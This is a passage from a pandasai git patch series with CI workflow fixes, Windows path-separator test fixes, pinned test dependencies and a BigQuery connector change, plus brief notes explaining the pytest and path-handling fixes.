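            subprocess.run(["poetry", "run", "pytest", "tests/"], cwd=ext, check=True)
            envs = subprocess.run(
                ["poetry", "env", "list", "--full-path"],
                cwd=ext, capture_output=True, text=True, check=True,
            ).stdout.split()
            if envs:  # first token is the env path, as in the workflow's awk '{print $1}'
                subprocess.run(["poetry", "env", "remove", envs[0]], cwd=ext, check=True)

    for root in ("extensions/llms", "extensions/connectors", "extensions/ee"):
        run_extension_tests(root)
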
From 9a29b78c0f6eb59804c48574186a9df541ee8b53 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:51:52 +0100
Subject: [PATCH 40/58] fix ci pipeline
---
.github/workflows/ci.yml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 40a352962..96530ca64 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -65,6 +65,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ poetry add pytest
)
fi
done
@@ -88,6 +89,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ poetry add pytest
)
fi
done
@@ -111,6 +113,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
+ poetry add pytest
)
fi
done
From 65cd422c7e6517c4645caeff106300e6df926dfc Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:56:27 +0100
Subject: [PATCH 41/58] fix ci pipeline
---
.github/workflows/ci.yml | 7 +++----
1 file changed, 3 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 96530ca64..f3eea9e91 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -54,7 +54,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
+ poetry install --all-extras --with dev
)
echo "Running tests for $dir"
(
@@ -65,7 +65,6 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest
)
fi
done
@@ -78,7 +77,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
+ poetry install --all-extras --with dev
)
echo "Running tests for $dir"
(
@@ -102,7 +101,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras
+ poetry install --all-extras --with dev
)
echo "Running tests for $dir"
(
From 2cd235302e3311d5753c1b260e911082a7f60325 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:58:23 +0100
Subject: [PATCH 42/58] fix ci pipeline
---
.github/workflows/ci.yml | 3 +++
1 file changed, 3 insertions(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index f3eea9e91..cd706443e 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,6 +55,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras --with dev
+ poetry add pytest
)
echo "Running tests for $dir"
(
@@ -78,6 +79,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras --with dev
+ poetry add pytest
)
echo "Running tests for $dir"
(
@@ -102,6 +104,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras --with dev
+ poetry add pytest
)
echo "Running tests for $dir"
(
From def1433b1e9c7554811b61e4b18810917b7c0efd Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:05:03 +0100
Subject: [PATCH 43/58] fix ci pipeline
---
.github/workflows/ci.yml | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index cd706443e..171814669 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -54,7 +54,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras --with dev
+ poetry install --all-extras
poetry add pytest
)
echo "Running tests for $dir"
@@ -78,7 +78,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras --with dev
+ poetry install --all-extras
poetry add pytest
)
echo "Running tests for $dir"
@@ -103,7 +103,7 @@ jobs:
echo "Installing dependencies for $dir"
(
cd "$dir" || exit
- poetry install --all-extras --with dev
+ poetry install --all-extras
poetry add pytest
)
echo "Running tests for $dir"
From ee62baff08a03d2c341796b7b1114ed7e7a78b37 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:16:45 +0100
Subject: [PATCH 44/58] fix: ci
---
.github/workflows/ci.yml | 9 ++++-----
1 file changed, 4 insertions(+), 5 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 171814669..d93d2b9a0 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,7 +55,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest
+ poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -79,7 +79,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest
+ poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -90,7 +90,6 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest
)
fi
done
@@ -104,7 +103,7 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest
+ poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -115,7 +114,7 @@ jobs:
(
cd "$dir" || exit
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest
+ poetry add pytest@7.4.0
)
fi
done
From 09587497675b5009c0a8c0719ae143d7f2dd1acf Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:23:27 +0100
Subject: [PATCH 45/58] fix: ci
---
.github/workflows/ci.yml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index d93d2b9a0..7cee04e25 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -65,6 +65,7 @@ jobs:
echo "Cleaning up dependencies for $dir"
(
cd "$dir" || exit
+ sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
poetry env remove $(poetry env list --full-path | awk '{print $1}')
)
fi
@@ -89,6 +90,7 @@ jobs:
echo "Cleaning up dependencies for $dir"
(
cd "$dir" || exit
+ sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
poetry env remove $(poetry env list --full-path | awk '{print $1}')
)
fi
@@ -113,8 +115,8 @@ jobs:
echo "Cleaning up dependencies for $dir"
(
cd "$dir" || exit
+ sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
poetry env remove $(poetry env list --full-path | awk '{print $1}')
- poetry add pytest@7.4.0
)
fi
done
From bcec0715c4e5cfccfeb36cd7f18f27d25892d4b1 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:25:33 +0100
Subject: [PATCH 46/58] fix: ci
---
.github/workflows/ci.yml | 18 ------------------
1 file changed, 18 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 7cee04e25..4465a8298 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -62,12 +62,6 @@ jobs:
cd "$dir" || exit
poetry run pytest tests/
)
- echo "Cleaning up dependencies for $dir"
- (
- cd "$dir" || exit
- sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
- poetry env remove $(poetry env list --full-path | awk '{print $1}')
- )
fi
done
@@ -87,12 +81,6 @@ jobs:
cd "$dir" || exit
poetry run pytest tests/
)
- echo "Cleaning up dependencies for $dir"
- (
- cd "$dir" || exit
- sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
- poetry env remove $(poetry env list --full-path | awk '{print $1}')
- )
fi
done
@@ -112,12 +100,6 @@ jobs:
cd "$dir" || exit
poetry run pytest tests/
)
- echo "Cleaning up dependencies for $dir"
- (
- cd "$dir" || exit
- sudo chown -R $USER:$USER /Users/runner/Library/Caches/pypoetry/virtualenvs/
- poetry env remove $(poetry env list --full-path | awk '{print $1}')
- )
fi
done
From 2da13980df973b916954b6496235e5bab25508aa Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:40:51 +0100
Subject: [PATCH 47/58] fix: remove unused mocker fixture from Bedrock Claude test
---
extensions/llms/bedrock/tests/test_bedrock_claude.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/extensions/llms/bedrock/tests/test_bedrock_claude.py b/extensions/llms/bedrock/tests/test_bedrock_claude.py
index 2c022bcaf..1991518c6 100644
--- a/extensions/llms/bedrock/tests/test_bedrock_claude.py
+++ b/extensions/llms/bedrock/tests/test_bedrock_claude.py
@@ -68,7 +68,7 @@ def test_params_setting(self):
assert llm.top_k is None
assert llm.max_tokens == 64
- def test_call(self, mocker, prompt):
+ def test_call(self, prompt):
llm = BedrockClaude(bedrock_runtime_client=MockBedrockRuntimeClient())
expected_text = "This is the expected text."
result = llm.call(instruction=prompt)
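
pytest treats every test parameter as a fixture request, and mocker is provided by the pytest-mock plugin, so the old signature errored at collection time ("fixture 'mocker' not found") in any environment where that plugin was absent, even though the body never used it. A minimal runnable reduction of the failure mode (the prompt fixture content here is illustrative):

    import pytest

    @pytest.fixture
    def prompt():
        return "What is the expected text?"

    # Had this signature also requested `mocker`, collection would fail without
    # pytest-mock installed; requesting only locally defined fixtures avoids
    # the hidden plugin dependency.
    def test_call(prompt):
        assert isinstance(prompt, str)
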
From 7570c2baaf6a4cca2328d8923e8fed77f84893c8 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:49:59 +0100
Subject: [PATCH 48/58] fix: CI
---
.github/workflows/ci.yml | 3 ---
1 file changed, 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 4465a8298..3f78249c1 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,7 +55,6 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -74,7 +73,6 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
@@ -93,7 +91,6 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
- poetry add pytest@7.4.0
)
echo "Running tests for $dir"
(
From f2f15ce301bbb4ac5ec3faa0dd005650bd466f89 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:52:04 +0100
Subject: [PATCH 49/58] fix: CI
---
.github/workflows/ci.yml | 9 +++++++++
1 file changed, 9 insertions(+)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 3f78249c1..d6c324bac 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -55,6 +55,9 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
)
echo "Running tests for $dir"
(
@@ -73,6 +76,9 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
)
echo "Running tests for $dir"
(
@@ -91,6 +97,9 @@ jobs:
(
cd "$dir" || exit
poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
)
echo "Running tests for $dir"
(
From f8e5f2386f8deb7cbfe6df2db95d7618a5890dec Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 17:58:02 +0100
Subject: [PATCH 50/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 10 ++++++++--
1 file changed, 8 insertions(+), 2 deletions(-)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index c0165a720..9bb48d3d1 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -118,7 +118,10 @@ def test_get_cache_file_path_with_destination_path(self, sample_schema):
loader.schema = sample_schema
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path.endswith("datasets/test/users/users.parquet")
+ if sys.platform.startswith("win"):
+ assert cache_path.endswith("datasets\\test\\users\\users.parquet")
+ else:
+ assert cache_path.endswith("datasets/test/users/users.parquet")
def test_get_cache_file_path_without_destination_path(self, sample_schema):
schema_without_path = sample_schema.copy()
@@ -127,7 +130,10 @@ def test_get_cache_file_path_without_destination_path(self, sample_schema):
loader.schema = schema_without_path
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
- assert cache_path.endswith("datasets/test/users/data.parquet")
+ if sys.platform.startswith("win"):
+ assert cache_path.endswith("datasets\\test\\users\\data.parquet")
+ else:
+ assert cache_path.endswith("datasets/test/users/data.parquet")
def test_is_cache_valid(self, sample_schema):
loader = DatasetLoader()
From 59b42ed13c879835a9773d84622507a502f83c79 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:00:46 +0100
Subject: [PATCH 51/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 1 +
1 file changed, 1 insertion(+)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 9bb48d3d1..a6f3f8c8d 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -3,6 +3,7 @@
import pandas as pd
import pytest
+import sys
from pandasai.data_loader.loader import DatasetLoader
from pandasai.dataframe.base import DataFrame
From 7e207eb20e56533f39d9496b07c03c28f5205f36 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:02:28 +0100
Subject: [PATCH 52/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index a6f3f8c8d..266b592e2 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -1,9 +1,9 @@
+import sys
from datetime import datetime, timedelta
from unittest.mock import mock_open, patch
import pandas as pd
import pytest
-import sys
from pandasai.data_loader.loader import DatasetLoader
from pandasai.dataframe.base import DataFrame
From 3982c4590d3ac61d949e6b7ebc0039fa50270fcc Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:10:40 +0100
Subject: [PATCH 53/58] fix: test case on windows
---
tests/unit_tests/dataframe/test_loader.py | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/tests/unit_tests/dataframe/test_loader.py b/tests/unit_tests/dataframe/test_loader.py
index 266b592e2..9ebed40e5 100644
--- a/tests/unit_tests/dataframe/test_loader.py
+++ b/tests/unit_tests/dataframe/test_loader.py
@@ -120,7 +120,7 @@ def test_get_cache_file_path_with_destination_path(self, sample_schema):
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
if sys.platform.startswith("win"):
- assert cache_path.endswith("datasets\\test\\users\\users.parquet")
+ assert cache_path.endswith("datasets\\test/users\\users.parquet")
else:
assert cache_path.endswith("datasets/test/users/users.parquet")
@@ -132,7 +132,7 @@ def test_get_cache_file_path_without_destination_path(self, sample_schema):
loader.dataset_path = "test/users"
cache_path = loader._get_cache_file_path()
if sys.platform.startswith("win"):
- assert cache_path.endswith("datasets\\test\\users\\data.parquet")
+ assert cache_path.endswith("datasets\\test/users\\data.parquet")
else:
assert cache_path.endswith("datasets/test/users/data.parquet")
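
The mixed separators in the final expected suffix are deliberate: on Windows, os.path.join inserts backslashes between its arguments but leaves the forward slash inside the literal "test/users" untouched. A small demonstration (the join structure of _get_cache_file_path is assumed from the asserted suffixes):

    import os

    dataset_path = "test/users"  # stored with forward slashes on every platform
    cache = os.path.join("datasets", dataset_path, "users.parquet")
    # POSIX:   datasets/test/users/users.parquet
    # Windows: datasets\test/users\users.parquet  -- join adds "\", the inner "/" survives
    print(cache)
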
From ecafc64043e865d63115e27c6f3939655b55c054 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 18:40:41 +0100
Subject: [PATCH 54/58] fix: CI
---
.github/workflows/ci.yml | 15 ++++++++++++---
1 file changed, 12 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index d6c324bac..d438353d8 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -109,9 +109,6 @@ jobs:
fi
done
- - name: Run extension tests
- if: matrix.os != 'windows-latest'
- run: make test_extensions
- name: Run extension tests (Windows)
if: matrix.os == 'windows-latest'
run: |
@@ -121,6 +118,10 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
+ poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
poetry run pytest tests/
Pop-Location
}
@@ -132,6 +133,10 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
+ poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
poetry run pytest tests/
Pop-Location
}
@@ -143,6 +148,10 @@ jobs:
if (Test-Path $testDir) {
Write-Host "Running tests for $($_.FullName)"
Push-Location $_.FullName
+ poetry install --all-extras
+ poetry add pytest@7.4.0
+ poetry add pytest-mock@3.11.1
+ poetry add pytest-cov@4.1.0
poetry run pytest tests/
Pop-Location
}
From 64e51e34e3f1cc6a63f623873c317d683a97c564 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 20:02:54 +0100
Subject: [PATCH 55/58] feat(bigquery): add test cases for BigQuery connector
---
.../bigquery/pandasai_bigquery/__init__.py | 3 +-
extensions/ee/connectors/bigquery/poetry.lock | 48 ++++++-------
.../ee/connectors/bigquery/pyproject.toml | 2 +-
.../bigquery/tests/test_bigquery.py | 68 +++++++++++++++++++
4 files changed, 91 insertions(+), 30 deletions(-)
create mode 100644 extensions/ee/connectors/bigquery/tests/test_bigquery.py
diff --git a/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py b/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py
index bdce28f4e..6d0ffb928 100644
--- a/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py
+++ b/extensions/ee/connectors/bigquery/pandasai_bigquery/__init__.py
@@ -1,6 +1,5 @@
from google.cloud import bigquery
import pandas as pd
-from .google_big_query import GoogleBigQueryConnector
def load_from_bigquery(connection_info, query):
@@ -13,4 +12,4 @@ def load_from_bigquery(connection_info, query):
return pd.DataFrame(query_job.result())
-__all__ = ["GoogleBigQueryConnector", "load_from_bigquery"]
+__all__ = ["load_from_bigquery"]
diff --git a/extensions/ee/connectors/bigquery/poetry.lock b/extensions/ee/connectors/bigquery/poetry.lock
index d0b8fece2..dab545136 100644
--- a/extensions/ee/connectors/bigquery/poetry.lock
+++ b/extensions/ee/connectors/bigquery/poetry.lock
@@ -1,4 +1,4 @@
-# This file is automatically @generated by Poetry 1.8.4 and should not be changed by hand.
+# This file is automatically @generated by Poetry 1.8.5 and should not be changed by hand.
[[package]]
name = "cachetools"
@@ -890,39 +890,58 @@ description = "Database Abstraction Library"
optional = false
python-versions = ">=3.7"
files = [
+ {file = "SQLAlchemy-2.0.36-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:59b8f3adb3971929a3e660337f5dacc5942c2cdb760afcabb2614ffbda9f9f72"},
+ {file = "SQLAlchemy-2.0.36-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:37350015056a553e442ff672c2d20e6f4b6d0b2495691fa239d8aa18bb3bc908"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:8318f4776c85abc3f40ab185e388bee7a6ea99e7fa3a30686580b209eaa35c08"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c245b1fbade9c35e5bd3b64270ab49ce990369018289ecfde3f9c318411aaa07"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-musllinux_1_2_aarch64.whl", hash = "sha256:69f93723edbca7342624d09f6704e7126b152eaed3cdbb634cb657a54332a3c5"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-musllinux_1_2_x86_64.whl", hash = "sha256:f9511d8dd4a6e9271d07d150fb2f81874a3c8c95e11ff9af3a2dfc35fe42ee44"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-win32.whl", hash = "sha256:c3f3631693003d8e585d4200730616b78fafd5a01ef8b698f6967da5c605b3fa"},
{file = "SQLAlchemy-2.0.36-cp310-cp310-win_amd64.whl", hash = "sha256:a86bfab2ef46d63300c0f06936bd6e6c0105faa11d509083ba8f2f9d237fb5b5"},
+ {file = "SQLAlchemy-2.0.36-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:fd3a55deef00f689ce931d4d1b23fa9f04c880a48ee97af488fd215cf24e2a6c"},
+ {file = "SQLAlchemy-2.0.36-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:4f5e9cd989b45b73bd359f693b935364f7e1f79486e29015813c338450aa5a71"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:d0ddd9db6e59c44875211bc4c7953a9f6638b937b0a88ae6d09eb46cced54eff"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:2519f3a5d0517fc159afab1015e54bb81b4406c278749779be57a569d8d1bb0d"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-musllinux_1_2_aarch64.whl", hash = "sha256:59b1ee96617135f6e1d6f275bbe988f419c5178016f3d41d3c0abb0c819f75bb"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-musllinux_1_2_x86_64.whl", hash = "sha256:39769a115f730d683b0eb7b694db9789267bcd027326cccc3125e862eb03bfd8"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-win32.whl", hash = "sha256:66bffbad8d6271bb1cc2f9a4ea4f86f80fe5e2e3e501a5ae2a3dc6a76e604e6f"},
{file = "SQLAlchemy-2.0.36-cp311-cp311-win_amd64.whl", hash = "sha256:23623166bfefe1487d81b698c423f8678e80df8b54614c2bf4b4cfcd7c711959"},
+ {file = "SQLAlchemy-2.0.36-cp312-cp312-macosx_10_13_x86_64.whl", hash = "sha256:f7b64e6ec3f02c35647be6b4851008b26cff592a95ecb13b6788a54ef80bbdd4"},
+ {file = "SQLAlchemy-2.0.36-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:46331b00096a6db1fdc052d55b101dbbfc99155a548e20a0e4a8e5e4d1362855"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:fdf3386a801ea5aba17c6410dd1dc8d39cf454ca2565541b5ac42a84e1e28f53"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ac9dfa18ff2a67b09b372d5db8743c27966abf0e5344c555d86cc7199f7ad83a"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-musllinux_1_2_aarch64.whl", hash = "sha256:90812a8933df713fdf748b355527e3af257a11e415b613dd794512461eb8a686"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-musllinux_1_2_x86_64.whl", hash = "sha256:1bc330d9d29c7f06f003ab10e1eaced295e87940405afe1b110f2eb93a233588"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-win32.whl", hash = "sha256:79d2e78abc26d871875b419e1fd3c0bca31a1cb0043277d0d850014599626c2e"},
{file = "SQLAlchemy-2.0.36-cp312-cp312-win_amd64.whl", hash = "sha256:b544ad1935a8541d177cb402948b94e871067656b3a0b9e91dbec136b06a2ff5"},
+ {file = "SQLAlchemy-2.0.36-cp313-cp313-macosx_10_13_x86_64.whl", hash = "sha256:b5cc79df7f4bc3d11e4b542596c03826063092611e481fcf1c9dfee3c94355ef"},
+ {file = "SQLAlchemy-2.0.36-cp313-cp313-macosx_11_0_arm64.whl", hash = "sha256:3c01117dd36800f2ecaa238c65365b7b16497adc1522bf84906e5710ee9ba0e8"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:9bc633f4ee4b4c46e7adcb3a9b5ec083bf1d9a97c1d3854b92749d935de40b9b"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9e46ed38affdfc95d2c958de328d037d87801cfcbea6d421000859e9789e61c2"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-musllinux_1_2_aarch64.whl", hash = "sha256:b2985c0b06e989c043f1dc09d4fe89e1616aadd35392aea2844f0458a989eacf"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-musllinux_1_2_x86_64.whl", hash = "sha256:4a121d62ebe7d26fec9155f83f8be5189ef1405f5973ea4874a26fab9f1e262c"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-win32.whl", hash = "sha256:0572f4bd6f94752167adfd7c1bed84f4b240ee6203a95e05d1e208d488d0d436"},
{file = "SQLAlchemy-2.0.36-cp313-cp313-win_amd64.whl", hash = "sha256:8c78ac40bde930c60e0f78b3cd184c580f89456dd87fc08f9e3ee3ce8765ce88"},
+ {file = "SQLAlchemy-2.0.36-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:be9812b766cad94a25bc63bec11f88c4ad3629a0cec1cd5d4ba48dc23860486b"},
+ {file = "SQLAlchemy-2.0.36-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:50aae840ebbd6cdd41af1c14590e5741665e5272d2fee999306673a1bb1fdb4d"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:4557e1f11c5f653ebfdd924f3f9d5ebfc718283b0b9beebaa5dd6b77ec290971"},
+ {file = "SQLAlchemy-2.0.36-cp37-cp37m-musllinux_1_2_aarch64.whl", hash = "sha256:07b441f7d03b9a66299ce7ccf3ef2900abc81c0db434f42a5694a37bd73870f2"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-musllinux_1_2_x86_64.whl", hash = "sha256:28120ef39c92c2dd60f2721af9328479516844c6b550b077ca450c7d7dc68575"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-win32.whl", hash = "sha256:b81ee3d84803fd42d0b154cb6892ae57ea6b7c55d8359a02379965706c7efe6c"},
{file = "SQLAlchemy-2.0.36-cp37-cp37m-win_amd64.whl", hash = "sha256:f942a799516184c855e1a32fbc7b29d7e571b52612647866d4ec1c3242578fcb"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:3d6718667da04294d7df1670d70eeddd414f313738d20a6f1d1f379e3139a545"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:72c28b84b174ce8af8504ca28ae9347d317f9dba3999e5981a3cd441f3712e24"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b11d0cfdd2b095e7b0686cf5fabeb9c67fae5b06d265d8180715b8cfa86522e3"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:e32092c47011d113dc01ab3e1d3ce9f006a47223b18422c5c0d150af13a00687"},
+ {file = "SQLAlchemy-2.0.36-cp38-cp38-musllinux_1_2_aarch64.whl", hash = "sha256:6a440293d802d3011028e14e4226da1434b373cbaf4a4bbb63f845761a708346"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-musllinux_1_2_x86_64.whl", hash = "sha256:c54a1e53a0c308a8e8a7dffb59097bff7facda27c70c286f005327f21b2bd6b1"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-win32.whl", hash = "sha256:1e0d612a17581b6616ff03c8e3d5eff7452f34655c901f75d62bd86449d9750e"},
{file = "SQLAlchemy-2.0.36-cp38-cp38-win_amd64.whl", hash = "sha256:8958b10490125124463095bbdadda5aa22ec799f91958e410438ad6c97a7b793"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-macosx_10_9_x86_64.whl", hash = "sha256:dc022184d3e5cacc9579e41805a681187650e170eb2fd70e28b86192a479dcaa"},
+ {file = "SQLAlchemy-2.0.36-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:b817d41d692bf286abc181f8af476c4fbef3fd05e798777492618378448ee689"},
